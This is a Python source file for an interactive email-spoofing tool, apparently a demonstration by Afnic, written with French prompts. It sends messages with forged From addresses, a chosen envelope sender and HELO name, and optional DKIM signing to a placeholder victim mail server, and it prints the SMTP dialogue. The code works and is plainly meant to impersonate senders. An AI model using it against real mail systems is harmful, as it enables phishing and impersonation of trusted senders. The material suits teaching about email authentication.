2023-10-25 15:50:21 +02:00
|
|
|
|
#!/usr/bin/env python3
|
2023-10-25 15:50:33 +02:00
|
|
|
|
#
|
|
|
|
|
# SPDX-FileCopyrightText: 2023 Afnic
|
|
|
|
|
#
|
|
|
|
|
# SPDX-License-Identifier: GPL-3.0-or-later
|
|
|
|
|
#
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
from argparse import ArgumentParser
|
2023-10-25 15:50:21 +02:00
|
|
|
|
from email.message import EmailMessage
|
|
|
|
|
import email.utils
|
|
|
|
|
import importlib.resources
|
2023-10-25 15:50:24 +02:00
|
|
|
|
import json
|
2023-10-25 15:50:21 +02:00
|
|
|
|
import pathlib
|
|
|
|
|
import re
|
|
|
|
|
import smtplib
|
|
|
|
|
import sys
|
|
|
|
|
import uuid
|
|
|
|
|
|
|
|
|
|
import dkim
|
|
|
|
|
from rich.console import Console
|
|
|
|
|
import rich.highlighter
|
|
|
|
|
import rich.panel
|
|
|
|
|
from rich.prompt import Confirm, Prompt
|
|
|
|
|
import rich.text
|
|
|
|
|
from rich.theme import Theme
|
|
|
|
|
|
|
|
|
|
import spoof_templates
|
|
|
|
|
|
|
|
|
|
# Identity used by the sending (spoofing) side. The domain is written once
# and the other attacker-side values are derived from it, the same way
# VICTIM_ADDRESS is derived from VICTIM_DOMAIN below.
ATTACKER_DOMAIN = "attaquant.example"
# Default hostname offered by ask_helo() and by the --helo option.
DEFAULT_HELO = ATTACKER_DOMAIN
# Envelope sender proposed as the alternative to the template's From address.
ATTACKER_MAIL_FROM = f"usurpateur@{ATTACKER_DOMAIN}"

# Recipient of the generated message.
VICTIM_NAME = "Destinataire"
VICTIM_DOMAIN = "destinataire.example"
# Host that send_email() connects to.
VICTIM_MX = "mx.destinataire.example"
VICTIM_ADDRESS = f"destinataire@{VICTIM_DOMAIN}"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class SMTPHighlighter(rich.highlighter.Highlighter):
    """Style the key part of an SMTP line according to the dialogue stage.

    ``state`` selects which entry of ``patterns`` is tried against a line.
    Every named group of the selected pattern is used as the style name for
    the span that group matched.
    """

    # Stage name -> regular expression; group names double as style names.
    patterns = {
        'helo': r'(?:HELO|EHLO) (?P<helo>.*)',
        'mail_from': r'MAIL FROM:<(?P<mail_from>.*?)>',
        'rcpt_to': r'RCPT TO:<(?P<rcpt_to>.*)>',
        'data': r'From: (?P<data_display_name>.* <(?P<data_from>.*)>)'
    }

    def __init__(self, **kwargs):
        """Start in the 'connect' stage, for which no pattern is registered."""
        super().__init__(**kwargs)
        self.state = 'connect'

    def highlight(self, text):
        """Apply the styles of the current stage to ``text`` in place.

        Nothing happens when the current stage has no pattern or when the
        pattern does not match at the start of ``text.plain``.
        """
        pattern = SMTPHighlighter.patterns.get(self.state)
        if not pattern:
            return
        found = re.match(pattern, text.plain)
        if found is None:
            return
        for group_name in found.groupdict():
            span_start, span_end = found.span(group_name)
            text.stylize(group_name, span_start, span_end)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# Style names available to the console markup used throughout this file.
custom_theme = Theme(styles={
    # Banner panel shown when the interactive session starts.
    "banner": "bold red",
    # Direction arrows printed in front of traced SMTP traffic.
    "incoming": "yellow",
    "outgoing": "cyan",
    # Identities appearing at the different stages of the SMTP dialogue.
    "helo": "bold sea_green1",
    "mail_from": "bold underline sky_blue1",
    "rcpt_to": "bold underline pale_violet_red1",
    "data_from": "bold underline medium_purple1",
    "data_display_name": "medium_purple1",
    # Classes attached to traced lines, and the final delivery verdict.
    "comment": "#777777",
    "failure": "bold red",
    "success": "green",
    "text": "default"
})

# Single console shared by every function in this file.
console = Console(theme=custom_theme, highlighter=None)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class SMTP(smtplib.SMTP):
    """``smtplib.SMTP`` client that records, and optionally prints, the dialogue.

    Everything sent and every reply received goes through :meth:`trace`,
    which appends an entry to ``self.log`` and, when ``self.output`` is
    truthy, prints it on the module-level ``console``.

    Attributes:
        highlighter: ``SMTPHighlighter`` whose ``state`` follows the dialogue
            stage (``helo``, ``mail_from``, ``rcpt_to``, ``data``).
        log: list of ``{'direction': ..., 'lines': [...]}`` dicts, where each
            line is ``{'class': <style name>, 'text': <str>}``.
        output: whether traced traffic is also printed.
    """

    def __init__(self, output, **kwargs):
        """Create the client.

        Args:
            output: truthy to print the dialogue while it happens.
            **kwargs: forwarded unchanged to ``smtplib.SMTP``.
        """
        # Our attributes must exist before the parent constructor runs: when
        # a ``host`` is supplied, smtplib.SMTP.__init__ calls connect(), and
        # the overrides below already use ``log`` and ``output``.
        self.highlighter = SMTPHighlighter()
        self.log = []
        self.output = output
        super().__init__(**kwargs)

    def trace(self, s, direction):
        """Record one chunk of traffic and print it if output is enabled.

        Long chunks are shortened to their first four lines, a marker giving
        the number of omitted lines, and their last line.

        Args:
            s: the traffic, as ``str`` or ``bytes``.
            direction: ``'in'`` for server replies, ``'out'`` for sent data.

        Raises:
            ValueError: if ``direction`` is neither ``'in'`` nor ``'out'``.
        """
        if direction not in ('in', 'out'):
            raise ValueError("direction must be 'in' or 'out'")

        arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'}
        max_lines = 4

        if isinstance(s, bytes):
            # Tracing must never abort the exchange because of odd bytes.
            s = s.decode('utf-8', errors='replace')

        lines = [{'class': 'text', 'text': text} for text in s.splitlines()]
        # NOTE: self.highlighter is kept in sync by ehlo()/mail()/rcpt()/data()
        # but is not applied to the lines here.

        # Lines strictly between the first ``max_lines`` and the last one.
        # Only shorten when at least one line would really be dropped, so a
        # chunk of exactly max_lines + 1 lines gets no "0 ligne omise" marker.
        suppressed_count = len(lines) - max_lines - 1
        if suppressed_count > 0:
            if suppressed_count > 1:
                suppressed_text = f"{suppressed_count} lignes omises"
            else:
                suppressed_text = f"{suppressed_count} ligne omise"
            suppressed_obj = {'class': 'comment', 'text': suppressed_text}
            lines = lines[:max_lines] + [suppressed_obj] + lines[-1:]

        # Print the text on the console
        if self.output:
            for i, line in enumerate(lines):
                prefix = arrows[direction] if i == 0 else " "
                console.print(f" {prefix} ", end="")
                # The text comes from the network or from the message body:
                # print it literally instead of interpreting it as markup.
                console.print(line['text'], style=line['class'],
                              markup=False, emoji=False)
            if direction == 'in':
                console.print()

        # Save it internally too
        self.log.append({'direction': direction, 'lines': lines})

    def putcmd(self, cmd, args=''):
        """Send ``cmd`` in upper case, with ``args`` unchanged."""
        super().putcmd(cmd.upper(), args)

    def send(self, s):
        """Trace ``s`` as outgoing traffic, then send it."""
        self.trace(s, 'out')
        super().send(s)

    def getreply(self):
        """Read a server reply, trace it as incoming traffic and return it.

        The reply is traced in wire form: ``<code>-<text>`` for every line
        except the last, which uses ``<code> <text>``.

        Returns:
            The ``(code, message)`` pair from ``smtplib.SMTP.getreply``.
        """
        errcode, errmsg = super().getreply()
        # Replies are not guaranteed to be pure ASCII; replace what cannot be
        # decoded. ``or ['']`` keeps the status code visible when the reply
        # carries no text at all.
        reply_lines = errmsg.decode('us-ascii', errors='replace').splitlines() or ['']
        last_index = len(reply_lines) - 1
        formatted = [
            f"{errcode}{' ' if i == last_index else '-'}{line}"
            for i, line in enumerate(reply_lines)
        ]
        self.trace('\n'.join(formatted), 'in')
        return errcode, errmsg

    def connect(self, *args, **kwargs):
        """Add a connection note to the log, then connect.

        The note is appended before delegating so that it precedes whatever
        is traced during the connection itself. It is only stored in
        ``self.log``, never printed.
        """
        self.log.append({'direction': 'comment',
                         'lines': [{'class': 'comment',
                                    'text': 'Connexion établie au serveur'}]})
        return super().connect(*args, **kwargs)

    def ehlo(self, *args, **kwargs):
        """Switch the highlighter to the 'helo' stage, then send EHLO."""
        self.highlighter.state = 'helo'
        return super().ehlo(*args, **kwargs)

    def mail(self, *args, **kwargs):
        """Switch the highlighter to the 'mail_from' stage, then send MAIL."""
        self.highlighter.state = 'mail_from'
        return super().mail(*args, **kwargs)

    def rcpt(self, *args, **kwargs):
        """Switch the highlighter to the 'rcpt_to' stage, then send RCPT."""
        self.highlighter.state = 'rcpt_to'
        return super().rcpt(*args, **kwargs)

    def data(self, *args):
        """Switch the highlighter to the 'data' stage, then send DATA."""
        self.highlighter.state = 'data'
        return super().data(*args)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def ask_helo():
    """Prompt for the hostname to announce in HELO.

    Returns:
        The value returned by the prompt; ``DEFAULT_HELO`` is passed to it as
        the default.
    """
    return Prompt.ask(
        "Nom d’hôte dans le [helo]HELO[/helo]",
        default=DEFAULT_HELO,
        console=console,
    )
|
|
|
|
|
|
|
|
|
|
def ask_mail_from(default_mail_from):
    """Ask which address to use as the SMTP envelope sender (MAIL FROM).

    Two numbered options are offered: reuse ``default_mail_from`` or switch
    to ``ATTACKER_MAIL_FROM``. The question is repeated until the answer is
    one of the listed numbers.

    Args:
        default_mail_from: address proposed as option 1.

    Returns:
        The selected address.
    """
    console.print("Adresse RFC5321.MailFrom :")
    console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])")
    console.print(f" 2. Remplacer par une adresse qu’on maîtrise ([b]{ATTACKER_MAIL_FROM}[/])")
    console.print()
    choices = {
        1: default_mail_from,
        2: ATTACKER_MAIL_FROM
    }
    while True:
        response = Prompt.ask("Choix", console=console)
        try:
            result = choices[int(response)]
        except (ValueError, KeyError):
            # ValueError: not a number. KeyError: a number that is not on the
            # menu (``choices`` is a dict, so a bad key is a KeyError, not an
            # IndexError). Either way, ask again.
            continue
        console.print(f" ⇒ [mail_from]{result}[/]")
        return result
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def add_dkim_signature(email):
    """Optionally sign ``email`` with DKIM, after asking the user.

    When the user accepts, a selector and a signing domain are requested,
    the private key is read from ``<selector>.private`` in the current
    directory, and the resulting signature is added to the message as a
    ``DKIM-Signature`` header.

    Args:
        email: the message to sign; it is modified in place.

    Returns:
        The same ``email`` object, signed or not.

    Raises:
        OSError: if the private key file cannot be read.
        ValueError: if the signer output has no ``DKIM-Signature`` header.
    """
    # ``choices`` must be a list: with the string "on" the membership test
    # becomes a substring test, and typing "on" would be accepted as "no".
    wants_signature = Confirm.ask("Ajouter une signature DKIM ?",
                                  choices=["o", "n"],
                                  default=False,
                                  console=console)
    if not wants_signature:
        console.print(" ⇒ Pas de signature DKIM")
        return email

    email_bytes = email.as_string().encode('utf-8')
    selector = Prompt.ask("Sélecteur", console=console)
    # Read the key right away so a wrong selector fails before more questions.
    private_key = pathlib.Path(f"{selector}.private").read_bytes()
    domain = Prompt.ask("Domaine", default=ATTACKER_DOMAIN, console=console)

    signature_line = dkim.dkim_sign(email_bytes,
                                    selector.encode('ascii'),
                                    domain.encode('ascii'),
                                    private_key).decode('ascii')
    # Keep only the header value; the header name is supplied when the value
    # is assigned to the message below.
    mobj = re.match(r"^DKIM-Signature: (.*)\r\n", signature_line, re.DOTALL)
    if mobj is None:
        raise ValueError("DKIM signer did not return a DKIM-Signature header")

    console.print(" ⇒ Signature DKIM ajoutée")
    email['DKIM-Signature'] = mobj.group(1)
    return email
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def generate_email(template):
    """Complete the message carried by ``template`` with delivery headers.

    Sets ``To``, ``Date`` and ``Message-ID``, and adds a plain-text UTF-8
    ``Content-Type`` when the message does not already declare one.

    Args:
        template: object exposing the message as ``template.msg``.

    Returns:
        ``template.msg`` itself. The headers are added to that object, not
        to a copy.
    """
    msg = template.msg
    msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>"
    msg['Date'] = email.utils.formatdate()
    # RFC 5322 requires a message identifier to be enclosed in angle brackets.
    msg['Message-ID'] = f"<{uuid.uuid4()}@{DEFAULT_HELO}>"
    if not msg['Content-Type']:
        msg['Content-Type'] = "text/plain; charset=utf-8"

    return msg
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def ask_template():
    """List the available scenarios and return the one the user picks.

    Scenarios are numbered from 1. The question is repeated until the answer
    is a number that appears in the list.

    Returns:
        The selected template object.
    """
    templates = spoof_templates.spoof_templates()
    console.print("[bold]Sélectionner un scénario :[/]")
    for number, template in enumerate(templates, start=1):
        console.print(f"{number:4}. {template.nice_name}")
    console.print()

    while True:
        response = Prompt.ask("Choix", console=console)
        try:
            number = int(response)
        except ValueError:
            continue
        # Check the range explicitly: plain indexing would accept 0 and
        # negative numbers and silently pick a scenario from the end.
        if not 1 <= number <= len(templates):
            continue
        result = templates[number - 1]
        console.print(f" ⇒ [bold]{result.nice_name}[/]")
        console.print()
        return result
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
def send_email(helo, envelope_from, email, output=True):
    """Deliver ``email`` to ``VICTIM_ADDRESS`` through ``VICTIM_MX``.

    Args:
        helo: hostname passed to the client as ``local_hostname``.
        envelope_from: address used as the SMTP envelope sender.
        email: message object; it is serialised with ``as_string()``.
        output: whether the SMTP dialogue is printed while it happens.

    Returns:
        ``{'outcome': 'success' | 'failure', 'log': [...]}`` where ``log`` is
        the dialogue recorded by the client. ``'failure'`` means an
        ``smtplib.SMTPException`` was raised while connecting or sending.

    Raises:
        Any exception other than ``smtplib.SMTPException`` is propagated
        unchanged.
    """
    data = email.as_string().encode('utf-8')
    with SMTP(local_hostname=helo, output=output) as smtp:
        try:
            smtp.connect(VICTIM_MX)
            smtp.sendmail(envelope_from, VICTIM_ADDRESS, data)
        except smtplib.SMTPException:
            outcome = 'failure'
        else:
            outcome = 'success'
        # Returned from inside the ``with`` block: the dict refers to the
        # client's own log list, so anything traced while the context is
        # closed still ends up in the returned log.
        return {'outcome': outcome, 'log': smtp.log}
|
2023-10-25 15:50:21 +02:00
|
|
|
|
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
def interactive_main():
    """Run the interactive session: choose a scenario, then send the message.

    The user picks a scenario, the envelope sender, the HELO name and whether
    to add a DKIM signature; the message is then sent with the SMTP dialogue
    printed, followed by the delivery verdict. Ctrl-C ends the session
    quietly; any other exception propagates.
    """
    try:
        console.print(
            rich.panel.Panel(
                "🕱 Outil d’usurpation d’identité de courriel 🕱",
                style="banner",
                width=80))
        console.print()

        template = ask_template()
        display_name, rfc5322from = re.match('(.*) <(.*)>', template.msg['From']).groups()
        console.print("Adresse RFC5322.From (tirée du scénario):")
        console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]")
        console.print()

        envelope_from = ask_mail_from(rfc5322from)
        console.print()

        helo = ask_helo()
        console.print()

        email = generate_email(template)
        signed_email = add_dkim_signature(email)

        results = send_email(helo, envelope_from, signed_email, output=True)
        if results['outcome'] == 'success':
            console.print(" [success]✔[/] Message [success]accepté[/] par le serveur SMTP")
        elif results['outcome'] == 'failure':
            console.print(" [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP")

    except KeyboardInterrupt:
        # Finish the interrupted prompt line and leave without a traceback.
        console.print()
|
|
|
|
|
|
|
|
|
|
|
2023-10-25 15:50:24 +02:00
|
|
|
|
|
|
|
|
|
def main():
    """Command-line entry point.

    Without ``--non-interactive`` the interactive session is started and the
    other options are not used. With it, the result is printed as JSON on
    standard output:

    * ``--get-config`` prints the defaults and the list of scenarios;
    * otherwise ``--template`` selects the scenario to send, ``--helo`` sets
      the HELO name and ``--replace-rfc5321-mail-from`` switches the envelope
      sender to ``ATTACKER_MAIL_FROM``.

    A missing or unknown ``--template`` ends the program with a usage error.
    """
    parser = ArgumentParser()
    parser.add_argument('--non-interactive', default=False, action='store_true')
    parser.add_argument('--get-config', default=False, action='store_true')
    parser.add_argument('--template')
    parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true')
    parser.add_argument('--helo', default=DEFAULT_HELO)

    args = parser.parse_args()

    if not args.non_interactive:
        interactive_main()
        return

    if args.get_config:
        template_entries = []
        for t in spoof_templates.spoof_templates():
            # Split "Display Name <address>" once per template.
            from_name, from_address = re.match('(.*) <(.*)>', t.msg['From']).groups()
            template_entries.append({'id': t.name,
                                     'name': t.nice_name,
                                     'from_name': from_name,
                                     'from_address': from_address})
        config = {
            'default_helo': DEFAULT_HELO,
            'my_mail_from': ATTACKER_MAIL_FROM,
            'templates': template_entries
        }
        print(json.dumps(config))
        return

    templates = {t.name: t for t in spoof_templates.spoof_templates()}
    if args.template not in templates:
        # Covers both an omitted --template (None) and an unknown name.
        known = ', '.join(str(name) for name in templates)
        parser.error(f"--template must be one of: {known}")
    template = templates[args.template]

    rfc5322from = re.match('.* <(.*)>', template.msg['From']).group(1)
    if args.replace_rfc5321_mail_from:
        envelope_from = ATTACKER_MAIL_FROM
    else:
        envelope_from = rfc5322from

    # Named ``message`` so the imported ``email`` package is not shadowed.
    message = generate_email(template)
    results = send_email(args.helo, envelope_from, message, output=False)
    print(json.dumps(results))


if __name__ == '__main__':
    main()
|